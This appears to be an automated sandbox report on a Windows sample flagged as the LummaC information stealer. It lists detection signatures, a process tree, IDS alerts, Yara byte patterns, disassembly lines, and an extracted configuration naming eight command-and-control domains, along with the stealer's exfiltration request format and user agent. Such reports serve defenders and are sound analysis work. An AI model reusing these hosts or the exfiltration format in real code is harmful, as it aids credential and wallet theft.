Edit tour

Windows Analysis Report
wN8pQhRNnu.exe

Overview

General Information

Sample name:	wN8pQhRNnu.exe renamed because original name is a hash value
Original sample name:	1c8d14491c1d595f460ad1b654a10571.exe
Analysis ID:	1575335
MD5:	1c8d14491c1d595f460ad1b654a10571
SHA1:	20648de7cefb55d694240883c61681caf97daec6
SHA256:	cffae7a05b1561e21f9b10774d2d4cc5dbf1f48deca140e6e11b8bc6b102e84b
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Sample uses string decryption to hide its real strings

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

wN8pQhRNnu.exe (PID: 2536 cmdline: "C:\Users\user\Desktop\wN8pQhRNnu.exe" MD5: 1C8D14491C1D595F460AD1B654A10571)

5759.tmp.exe (PID: 5660 cmdline: "C:\Users\user\AppData\Local\Temp\5759.tmp.exe" MD5: D88E2431ABAC06BDF0CD03C034B3E5E3)

WerFault.exe (PID: 2060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5660 -s 1892 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["diffuculttan.xyz", "deafeninggeh.biz", "effecterectz.xyz", "awake-weaves.cyou", "wrathful-jammy.cyou", "immureprech.biz", "debonairnukk.xyz", "sordid-snaked.cyou"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.4130543835.00000000009E9000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1460:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000003.1793934788.0000000002510000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000001.00000002.2124427014.00000000009BA000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1058:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.5759.tmp.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
1.3.5759.tmp.exe.2510000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
1.3.5759.tmp.exe.2510000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
1.2.5759.tmp.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:31.466849+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.22.222	443	TCP
2024-12-15T09:23:35.048478+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.16.1	443	TCP
2024-12-15T09:23:39.091432+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	23.55.153.106	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:33.667750+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	104.21.22.222	443	TCP
2024-12-15T09:23:36.579198+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49733	104.21.16.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:33.667750+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49732	104.21.22.222	443	TCP
2024-12-15T09:23:36.579198+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49733	104.21.16.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:35.048478+0100	2058215	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	104.21.16.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:31.466849+0100	2058223	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	104.21.22.222	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:37.183846+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.4	61751	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:33.671989+0100	2058214	1	Domain Observed Used for C2 Detected	192.168.2.4	64826	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:36.892588+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.4	53885	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:36.750711+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.4	58921	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:36.608312+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.4	57451	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:30.089118+0100	2058222	1	Domain Observed Used for C2 Detected	192.168.2.4	53059	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:29.942881+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	56160	1.1.1.1	53	UDP
2024-12-15T09:23:37.326266+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	50660	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:37.040754+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.4	51917	1.1.1.1	53	UDP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:23.381564+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	172.67.179.207	443	TCP
2024-12-15T09:23:25.079794+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49731	176.113.115.19	80	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T09:23:39.854083+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49736	23.55.153.106	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: wN8pQhRNnu.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://wrathful-jammy.cyou/apiB	Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz:443/apipp	Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/2	Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/apib	Avira URL Cloud: Label: malware
Source: https://debonairnukk.xyz/apieg	Avira URL Cloud: Label: malware
Source: https://awake-weaves.cyou/apio	Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/apiyis	Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/L_	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Avira: detection malicious, Label: HEUR/AGEN.1312567

Found malware configuration

Source: 1.3.5759.tmp.exe.2510000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["diffuculttan.xyz", "deafeninggeh.biz", "effecterectz.xyz", "awake-weaves.cyou", "wrathful-jammy.cyou", "immureprech.biz", "debonairnukk.xyz", "sordid-snaked.cyou"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Source: wN8pQhRNnu.exe	ReversingLabs: Detection: 55%
Source: wN8pQhRNnu.exe	Virustotal: Detection: 50%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: wN8pQhRNnu.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: sordid-snaked.cyou
Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: awake-weaves.cyou
Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: wrathful-jammy.cyou
Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: debonairnukk.xyz
Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: diffuculttan.xyz
Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: effecterectz.xyz
Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: deafeninggeh.biz
Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: immureprech.biz
Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: sordid-snaked.cyou
Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: - Screen Resoluton:
Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Workgroup: -
Source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: 4h5VfH--

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Unpacked PE file: 0.2.wN8pQhRNnu.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Unpacked PE file: 1.2.5759.tmp.exe.400000.0.unpack

Source: wN8pQhRNnu.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h	1_2_0043CD60
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, edx	1_2_0040BDC9
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp al, 2Eh	1_2_00426054
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then jmp eax	1_2_00426054
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	1_2_0043B05D
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_0043B05D
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	1_2_0043B068
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_0043B068
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]	1_2_0040E83B
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	1_2_0043B05B
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_0043B05B
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0040A940
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov edx, ecx	1_2_0040A940
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h]	1_2_0040C917
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then jmp ecx	1_2_0043C1F0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	1_2_00425990
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx ecx, di	1_2_00425990
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_0043B195
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movsx eax, byte ptr [esi]	1_2_0043B9A1
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh	1_2_004369A0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	1_2_0041E9B0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_004299B0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then lea eax, dword ptr [esp+18h]	1_2_0042526A
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ebx, edi	1_2_0041D270
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov esi, eax	1_2_00423A34
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h	1_2_0043D2F0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edx, word ptr [eax]	1_2_0043D2F0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then jmp ecx	1_2_0043C280
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+eax]	1_2_00415298
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_00415298
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0043AAB2
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov word ptr [ebp+00h], 0000h	1_2_004252BA
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	1_2_004252BA
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov eax, ebx	1_2_0041CB05
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h	1_2_0043CB20
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov edx, eax	1_2_00427326
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_004143C2
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov edi, dword ptr [esp+34h]	1_2_004143C2
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	1_2_0042A3D0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0042C45C
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ebp, dword ptr [eax]	1_2_00436C00
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	1_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [esi+64h]	1_2_00418578
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov edx, eax	1_2_0042750D
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00421D10
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx]	1_2_0040DD25
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]	1_2_00417582
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]	1_2_00427DA2
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h	1_2_004205B0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0042C64A
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0042AE48
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then jmp eax	1_2_00426E50
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	1_2_0042B4F7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0042B4F7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0042AE24
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00433630
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0042C6E4
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	1_2_00425E90
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h	1_2_0043CE90
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_004166A0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0041BEA0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0042ADF4
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov eax, edx	1_2_0041C6BB
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then jmp eax	1_2_0043BF40
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]	1_2_00415F66
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	1_2_0043A777
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]	1_2_00409700
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-46h]	1_2_00409700
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]	1_2_00409700
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0042C726
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0042C735
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0040CFF3
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]	1_2_0040CFF3
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	1_2_0041DF80
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	1_2_0040D7A2
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	1_2_0040D7A2
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0093B08B
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0093B0AF
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h	1_2_0094D0F7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	1_2_009360F7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then jmp eax	1_2_009370E4
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, edx	1_2_0091C030
